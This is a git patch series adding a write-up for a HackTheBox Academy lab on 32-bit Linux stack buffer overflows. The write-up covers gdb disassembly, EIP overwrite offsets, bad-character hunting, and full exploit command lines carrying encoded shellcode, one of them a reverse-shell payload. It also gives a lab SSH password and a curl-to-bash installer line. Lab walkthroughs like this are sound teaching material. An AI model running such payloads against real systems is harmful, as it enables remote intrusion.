From 1cc748c96bc7e5d5150be343fb790a731622f0a3 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 18:49:28 +0100 Subject: [PATCH 01/14] Create Stack-Based Buffer Overflow Section.md --- Stack-Based Buffer Overflow Section.md | 76 ++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 Stack-Based Buffer Overflow Section.md diff --git a/Stack-Based Buffer Overflow Section.md b/Stack-Based Buffer Overflow Section.md new file mode 100644 index 0000000..b88de40 --- /dev/null +++ b/Stack-Based Buffer Overflow Section.md @@ -0,0 +1,76 @@ +# Stack Based Buffer Overflow Question +![Pasted image 20211120110142](https://user-images.githubusercontent.com/87600765/146052141-a62f3af8-fa2f-40da-a151-fb0f02535bfe.png) +#### Connection +Before we answer this question, you need to connect to your vpn first. Click on `get-vpn-key` and then click on download. Then go to your terminal at the path you downloaded your vpn and do: +```nasm +$ sudo openvpn academy.ovpn +``` +If all happened correctly you should have at the end of the output: +```nasm +Initialization Sequence Completed +``` +Then you need to connect to the target machine. +```nasm +$ sudo ssh htb-student@ip +``` + And then you put the password + ```nasm + HTB_@cademy_stdnt! + ``` +#### Answer + Nice ! Then if you do ls you will see a bow file. + ```nasm +$ ls +bow +``` + So you need to find at which adress in the `main function` the`bowfunc function` is called. So with gdb you will have to disassembl main. + ```nasm + gdb -q bow +Reading symbols from bow...(no debugging symbols found)...done. +(gdb) disassembl main +Dump of assembler code for function main: + 0x00000582 <+0>: lea 0x4(%esp),%ecx + 0x00000586 <+4>: and $0xfffffff0,%esp + 0x00000589 <+7>: pushl -0x4(%ecx) + 0x0000058c <+10>: push %ebp + 0x0000058d <+11>: mov %esp,%ebp + 0x0000058f <+13>: push %ebx + 0x00000590 <+14>: push %ecx + 0x00000591 <+15>: call 0x450 <__x86.get_pc_thunk.bx> + 0x00000596 <+20>: add $0x1a3e,%ebx + 0x0000059c <+26>: mov %ecx,%eax + 0x0000059e <+28>: mov 0x4(%eax),%eax + 0x000005a1 <+31>: add $0x4,%eax + 0x000005a4 <+34>: mov (%eax),%eax + 0x000005a6 <+36>: sub $0xc,%esp + 0x000005a9 <+39>: push %eax + 0x000005aa <+40>: call 0x54d + 0x000005af <+45>: add $0x10,%esp + 0x000005b2 <+48>: sub $0xc,%esp + 0x000005b5 <+51>: lea -0x1974(%ebx),%eax + 0x000005bb <+57>: push %eax + 0x000005bc <+58>: call 0x3e0 + 0x000005c1 <+63>: add $0x10,%esp + 0x000005c4 <+66>: mov $0x1,%eax + 0x000005c9 <+71>: lea -0x8(%ebp),%esp + 0x000005cc <+74>: pop %ecx + 0x000005cd <+75>: pop %ebx + 0x000005ce <+76>: pop %ebp + 0x000005cf <+77>: lea -0x4(%ecx),%esp +---Type to continue, or q to quit---q +``` +This is in AT&T syntax but if you want Intel syntax, you just need to do +```nasm +(gdb) set disassembly-flavor intel +``` +The first thing that we have to do is to look for a `call` instruction. So we have +```nasm +0x00000591 <+15>: call 0x450 <__x86.get_pc_thunk.bx> +0x000005aa <+40>: call 0x54d +0x000005bc <+58>: call 0x3e0 +``` +Now it's pretty intuitive because you can see in Operation Suffixes the name of the function called. +```nasm +0x000005aa <+40>: call 0x54d +``` +![Pasted image 20211120110235](https://user-images.githubusercontent.com/87600765/146052243-266536f7-2d6b-41f9-ad2f-6c711afa8c38.png) From 48472e83b01af73fa73ed8da4d56297e3647d3ed Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 18:56:23 +0100 Subject: [PATCH 02/14] Create CPU Registers Section.md --- CPU Registers Section.md | 51 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 CPU Registers Section.md diff --git a/CPU Registers Section.md b/CPU Registers Section.md new file mode 100644 index 0000000..78dfac4 --- /dev/null +++ b/CPU Registers Section.md @@ -0,0 +1,51 @@ +# CPU Registers Section +![Pasted image 20211127181005](https://user-images.githubusercontent.com/87600765/146052962-3bb254ec-a803-452b-af8b-1211167f5a87.png) + Now we know that eip can be overwritten with 1036 + 4 bytes we can verify it with this command: +```nasm +gef➤ run $(python -c "print '\x55' * 1036 + '\x66' *4") +Starting program: /mnt/c/Users/Jojo/documents/testcode/bow32 $(python -c "print '\x55' * 1036 + '\x66' *4") + +Program received signal SIGSEGV, Segmentation fault. +0x66666666 in ?? () +[ Legend: Modified register | Code | Heap | Stack | String ] +───────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── +$eax : 0x1 +$ebx : 0x55555555 ("UUUU"?) +$ecx : 0xffffd750 → 0x4e414c00 +$edx : 0xffffd0f0 → 0xffffd300 → 0x149dc001 +$esp : 0xffffd0f0 → 0xffffd300 → 0x149dc001 +$ebp : 0x55555555 ("UUUU"?) +$esi : 0xf7fb2000 → 0x001e9d6c +$edi : 0xf7fb2000 → 0x001e9d6c +$eip : 0x66666666 ("ffff"?) +$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification] +$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063 +───────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ──── +0xffffd0f0│+0x0000: 0xffffd300 → 0x149dc001 ← $esp +0xffffd0f4│+0x0004: 0xffffd1c4 → 0xffffd315 → "/mnt/c/Users/Jojo/documents/testcode/bow32" +0xffffd0f8│+0x0008: 0xffffd1d0 → 0xffffd751 → "LANG=en_US.UTF-8" +0xffffd0fc│+0x000c: 0x565561f2 → add ebx, 0x2e0e +0xffffd100│+0x0010: 0xffffd120 → 0x00000002 +0xffffd104│+0x0014: 0x00000000 +0xffffd108│+0x0018: 0x00000000 +0xffffd10c│+0x001c: 0xf7de6fd6 → <__libc_start_main+262> add esp, 0x10 +─────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ──── +[!] Cannot disassemble from $PC +[!] Cannot access memory at address 0x66666666 +─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── +[#0] Id 1, Name: "bow32", stopped 0x66666666 in ?? (), reason: SIGSEGV +───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── +──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── +``` + +We can see that the adress of EBP is `0x55555555`. You can also do +```shell-session +gef➤ i r ebp +ebp 0x55555555 0x55555555 +``` +![Pasted image 20211127182110](https://user-images.githubusercontent.com/87600765/146053541-9aaf3e24-d21b-45b8-bdda-ee5601dad527.png) + +The tool I used is call GEF. GEF is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. If you want to install it do +```nasm +bash -c "$(curl -fsSL http://gef.blah.cat/sh)" +``` From a9d5fc321f3f66c711b224ae2ad3d709ac4a4b01 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 18:59:13 +0100 Subject: [PATCH 03/14] Create Take Control of EIP Section.md --- Take Control of EIP Section.md | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 Take Control of EIP Section.md diff --git a/Take Control of EIP Section.md b/Take Control of EIP Section.md new file mode 100644 index 0000000..876b8c3 --- /dev/null +++ b/Take Control of EIP Section.md @@ -0,0 +1,6 @@ +# Take Control of EIP Section +![Pasted image 20211127183951](https://user-images.githubusercontent.com/87600765/146053798-c6feaf70-04b1-4be8-96f8-9cea6718698c.png) +We can see that in this image we have 100 bytes of NOPS and 150 bytes of shellcode. +![Pasted image 20211127184029](https://user-images.githubusercontent.com/87600765/146053860-16e86e3b-cd86-45e6-af27-8728fc816287.png) +We just have to do 100 + 150 = 250 bytes +![Pasted image 20211127184108](https://user-images.githubusercontent.com/87600765/146053936-226a7f4a-288f-40de-a2c1-dc791623914f.png) From dae7f1871c2ed4367b42aae159ff06dec86292e8 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 18:59:40 +0100 Subject: [PATCH 04/14] Update Take Control of EIP Section.md --- Take Control of EIP Section.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/Take Control of EIP Section.md b/Take Control of EIP Section.md index 876b8c3..64df1ef 100644 --- a/Take Control of EIP Section.md +++ b/Take Control of EIP Section.md @@ -1,6 +1,9 @@ # Take Control of EIP Section ![Pasted image 20211127183951](https://user-images.githubusercontent.com/87600765/146053798-c6feaf70-04b1-4be8-96f8-9cea6718698c.png) -We can see that in this image we have 100 bytes of NOPS and 150 bytes of shellcode. + +### We can see that in this image we have 100 bytes of NOPS and 150 bytes of shellcode. ![Pasted image 20211127184029](https://user-images.githubusercontent.com/87600765/146053860-16e86e3b-cd86-45e6-af27-8728fc816287.png) -We just have to do 100 + 150 = 250 bytes + +### We just have to do 100 + 150 = 250 bytes + ![Pasted image 20211127184108](https://user-images.githubusercontent.com/87600765/146053936-226a7f4a-288f-40de-a2c1-dc791623914f.png) From 793a7756e86ffc4408c75632faa929b4a5856b2e Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:00:29 +0100 Subject: [PATCH 05/14] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 10c2d3b..856504c 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# Stack-Based-Buffer-Overflows-on-Windows-x86 +# Stack-Based-Buffer-Overflows-on-Linux-x86 Writeup about the Stack-Based Buffer Overflows on Linux x86 module of HackThebox Academy Stack overflow is a type of buffer overflow vulnerability. When we pour water in a glass more than its capacity the water spills or overflow, similarly when we enter data in a buffer more than its capacity the data overflows to adjacent memory location causing program to crash. This is know as buffer overflow. From 1c2ad80a490dc3ea9692c799159a0a5cd0e70bd0 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:03:23 +0100 Subject: [PATCH 06/14] Update and rename Take Control of EIP Section.md to Determine the Length for Shellcode Section.md --- ... Section.md => Determine the Length for Shellcode Section.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename Take Control of EIP Section.md => Determine the Length for Shellcode Section.md (93%) diff --git a/Take Control of EIP Section.md b/Determine the Length for Shellcode Section.md similarity index 93% rename from Take Control of EIP Section.md rename to Determine the Length for Shellcode Section.md index 64df1ef..56a1a2c 100644 --- a/Take Control of EIP Section.md +++ b/Determine the Length for Shellcode Section.md @@ -1,4 +1,4 @@ -# Take Control of EIP Section +# Determine the Length for Shellcode ![Pasted image 20211127183951](https://user-images.githubusercontent.com/87600765/146053798-c6feaf70-04b1-4be8-96f8-9cea6718698c.png) ### We can see that in this image we have 100 bytes of NOPS and 150 bytes of shellcode. From b741ab43d590a7f426a9af00b7d7f27fe4e30006 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:03:52 +0100 Subject: [PATCH 07/14] Update and rename CPU Registers Section.md to Take Control of EIP Section.md --- CPU Registers Section.md => Take Control of EIP Section.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CPU Registers Section.md => Take Control of EIP Section.md (99%) diff --git a/CPU Registers Section.md b/Take Control of EIP Section.md similarity index 99% rename from CPU Registers Section.md rename to Take Control of EIP Section.md index 78dfac4..87c198f 100644 --- a/CPU Registers Section.md +++ b/Take Control of EIP Section.md @@ -1,4 +1,4 @@ -# CPU Registers Section +# Take Control of EIP Section ![Pasted image 20211127181005](https://user-images.githubusercontent.com/87600765/146052962-3bb254ec-a803-452b-af8b-1211167f5a87.png) Now we know that eip can be overwritten with 1036 + 4 bytes we can verify it with this command: ```nasm From a5815ca2056216a7ac130d9b3f0bd80645fd44e6 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:06:16 +0100 Subject: [PATCH 08/14] Create Identification of Bad Characters Section.md --- Identification of Bad Characters Section.md | 43 +++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 Identification of Bad Characters Section.md diff --git a/Identification of Bad Characters Section.md b/Identification of Bad Characters Section.md new file mode 100644 index 0000000..85e814d --- /dev/null +++ b/Identification of Bad Characters Section.md @@ -0,0 +1,43 @@ +# Identification of Bad Characters Section + +We have to search the other bad characters. We know that `\x00`, `\x09` and `\x0a` are bad characters so the chars's size after removed bad characters is: +```md +Buffer = "\x55" * (1040 - 253 - 4) = 783 +``` +```nasm +gef➤ break bowfunc +Breakpoint 1 at 0x11ad +gef➤ run $(python -c "print '\x55' * 783 + '\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' + '\x66' * 4") +``` +This is the examination of esp. +```nasm +0xffffd642: 0x55 0x55 0x55 0x55 0x55 0x55 0x55 0x55 +0xffffd64a: 0x55 0x55 0x55 0x55 0x55 0x01 0x02 0x03 +0xffffd652: 0x04 0x05 0x06 0x07 0x08 0x0b 0x0c 0x0d +0xffffd65a: 0x0e 0x0f 0x10 0x11 0x12 0x13 0x14 0x15 +0xffffd662: 0x16 0x17 0x18 0x19 0x1a 0x1b 0x1c 0x1d +0xffffd66a: 0x1e 0x1f 0x00 0x21 0x22 0x23 0x24 0x25 +``` +Note: `x/2000xb $esp` is a command for examine the register esp. +- the first x is for examine +- 2000 is the number of units we want to display +- the second x is for display in hexadecimal +- the b is for display a single byte + +We can see in this part that we encounter `\x00` instead of `\x20`. So now we have to retire `\x20` because it's a bad character. + +```md +# Substract the number of removed characters +Buffer = "\x55" * (1040 - 251 - 4) = 784 + +# "\x00" & "\x09" & "\x0a" & "\x20" removed: 256 - 4 = 252 bytes + CHARS = "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b......\xfd\xfe\xff" + + EIP = "\x66" * 4 +``` +Now we have to check if there are others bad characters. +```nasm +run $(python -c "print '\x55' * 784 + '\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' + '\x66' * 4") +``` +After this we can see that they are no null byte on our character array anymore, we can put all the bad characters that we found as the answer. +![Pasted image 20211203162721](https://user-images.githubusercontent.com/87600765/146054975-0dbfe1f9-b81c-479c-b294-08ec0dca7ae5.png) From 623fd8785f8a587b9c6f4994af5c8699ffef8547 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:07:41 +0100 Subject: [PATCH 09/14] Delete LICENSE --- LICENSE | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 LICENSE diff --git a/LICENSE b/LICENSE deleted file mode 100644 index fe19b1b..0000000 --- a/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2021 Birby - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. From 8cea8d15e371f930ea19de13d569479a5a36d320 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:08:00 +0100 Subject: [PATCH 10/14] Delete README.md --- README.md | 15 --------------- 1 file changed, 15 deletions(-) delete mode 100644 README.md diff --git a/README.md b/README.md deleted file mode 100644 index 856504c..0000000 --- a/README.md +++ /dev/null @@ -1,15 +0,0 @@ -# Stack-Based-Buffer-Overflows-on-Linux-x86 -Writeup about the Stack-Based Buffer Overflows on Linux x86 module of HackThebox Academy - -Stack overflow is a type of buffer overflow vulnerability. When we pour water in a glass more than its capacity the water spills or overflow, similarly when we enter data in a buffer more than its capacity the data overflows to adjacent memory location causing program to crash. This is know as buffer overflow. - -This vulnerability can be more or less difficult to exploit depending on the security put on the binary. The securities can be: -- Canaries -- Address Space Layout Randomization (ASLR) -- Data Execution Prevention (DEP) - -In this writeup you will learn how I exploit a binary with a simple stack-based buffer overflow without any bypassing to do etc. And may be learn new things about stack-based buffer overflow. - - - -*Thakur, A. S. (2019, December 4). Stack overflow vulnerability. Hacker Noon. Retrieved December 14, 2021, from https://hackernoon.com/stack-overflow-vulnerability-xou2bbm* From a45574856d8e3d564ba2a6957b234207817819ba Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:11:27 +0100 Subject: [PATCH 11/14] Create Generating Shellcode Section.md --- Generating Shellcode Section.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 Generating Shellcode Section.md diff --git a/Generating Shellcode Section.md b/Generating Shellcode Section.md new file mode 100644 index 0000000..e039e6b --- /dev/null +++ b/Generating Shellcode Section.md @@ -0,0 +1,19 @@ +# Generating Shellcode Section +![image](https://user-images.githubusercontent.com/87600765/146055566-e28fb669-89e6-4e43-acf8-783258527b48.png) +```nasm +run $(python -c 'print "\x55" * 817 + "\x90" * 124 + "\xba\xff\xce\xd4\x94\xda\xd4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x12\x31\x53\x12\x83\xeb\xfc\x03\xac\xc0\x36\x61\x63\x06\x41\x69\xd0\xfb\xfd\x04\xd4\x72\xe0\x69\xbe\x49\x63\x1a\x67\xe2\x5b\xd0\x17\x4b\xdd\x13\x7f\x33\x1d\xe4\x7e\xa3\x1f\xe4\xfa\x5a\xa9\x05\x4a\xfa\xf9\x94\xf9\xb0\xf9\x9f\x1c\x7b\x7d\xcd\xb6\xea\x51\x81\x2e\x9b\x82\x4a\xcc\x32\x54\x77\x42\x96\xef\x99\xd2\x13\x3d\xd9" + "\x66" * 4') +``` +After executing this command we want to know the stack size after overwriting eip. +```nasm +info proc all +``` +`info proc all` shows all the information about the process described under all of the above `info proc` subcommands. +We will have this +```nasm +...... +0xfffdd000 0xffffe000 0x21000 0x0 [stack] +...... +``` +So the stack size is `0x21000`. + +![Pasted image 20211204083730](https://user-images.githubusercontent.com/87600765/146055707-6195069e-4cbf-41ce-89dc-a778a36f6216.png) From 45be0346971b67dac30457daf9aced3c9f8d6e14 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:13:41 +0100 Subject: [PATCH 12/14] Create Reverse shell.md --- Reverse shell.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 Reverse shell.md diff --git a/Reverse shell.md b/Reverse shell.md new file mode 100644 index 0000000..ab3fb56 --- /dev/null +++ b/Reverse shell.md @@ -0,0 +1,12 @@ +## Stack based buffer overflow +```nasm +run $(python -c 'print "\x55" * 817 + "\x90" * 124 + "\xda\xd6\xd9\x74\x24\xf4\xbd\xad\xe4\xfa\x61\x58\x29\xc9\xb1\x12\x83\xc0\x04\x31\x68\x13\x03\xc5\xf7\x18\x94\x24\x23\x2b\xb4\x15\x90\x87\x51\x9b\x9f\xc9\x16\xfd\x52\x89\xc4\x58\xdd\xb5\x27\xda\x54\xb3\x4e\xb2\x19\x43\xb1\x43\x8e\x41\xb1\x39\x27\xcf\x50\x0d\xd1\x9f\xc3\x3e\xad\x23\x6d\x21\x1c\xa3\x3f\xc9\xf1\x8b\xcc\x61\x66\xfb\x1d\x13\x1f\x8a\x81\x81\x8c\x05\xa4\x95\x38\xdb\xa7" + "\x4c\xd6\xff\xff"') + ``` +![Pasted image 20211212185019](https://user-images.githubusercontent.com/87600765/146056009-8a100748-3245-4639-af9c-451f82e6ed79.png) + + I also realized that HTB did an error in their module. They wrote: + ```shell-session +Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817 +``` +But 1040 - 124 - 95 - 4 = 817 so be sure to put 817. + From 830ff3472fc039e2c9a6485cda77f28c6254af84 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:14:13 +0100 Subject: [PATCH 13/14] Update Reverse shell.md --- Reverse shell.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Reverse shell.md b/Reverse shell.md index ab3fb56..5377b3f 100644 --- a/Reverse shell.md +++ b/Reverse shell.md @@ -1,4 +1,4 @@ -## Stack based buffer overflow +## Reverse shell ```nasm run $(python -c 'print "\x55" * 817 + "\x90" * 124 + "\xda\xd6\xd9\x74\x24\xf4\xbd\xad\xe4\xfa\x61\x58\x29\xc9\xb1\x12\x83\xc0\x04\x31\x68\x13\x03\xc5\xf7\x18\x94\x24\x23\x2b\xb4\x15\x90\x87\x51\x9b\x9f\xc9\x16\xfd\x52\x89\xc4\x58\xdd\xb5\x27\xda\x54\xb3\x4e\xb2\x19\x43\xb1\x43\x8e\x41\xb1\x39\x27\xcf\x50\x0d\xd1\x9f\xc3\x3e\xad\x23\x6d\x21\x1c\xa3\x3f\xc9\xf1\x8b\xcc\x61\x66\xfb\x1d\x13\x1f\x8a\x81\x81\x8c\x05\xa4\x95\x38\xdb\xa7" + "\x4c\xd6\xff\xff"') ``` From c9b8f0307cde5d9f9a462ca2b71580a1187145f1 Mon Sep 17 00:00:00 2001 From: Birby <87600765+B1rby@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:57:27 +0100 Subject: [PATCH 14/14] Update Identification of Bad Characters Section.md --- Identification of Bad Characters Section.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Identification of Bad Characters Section.md b/Identification of Bad Characters Section.md index 85e814d..082c8de 100644 --- a/Identification of Bad Characters Section.md +++ b/Identification of Bad Characters Section.md @@ -1,5 +1,7 @@ # Identification of Bad Characters Section +![image](https://user-images.githubusercontent.com/87600765/146062068-27f43e9a-476f-4d91-9d9f-b02b562e665f.png) + We have to search the other bad characters. We know that `\x00`, `\x09` and `\x0a` are bad characters so the chars's size after removed bad characters is: ```md Buffer = "\x55" * (1040 - 253 - 4) = 783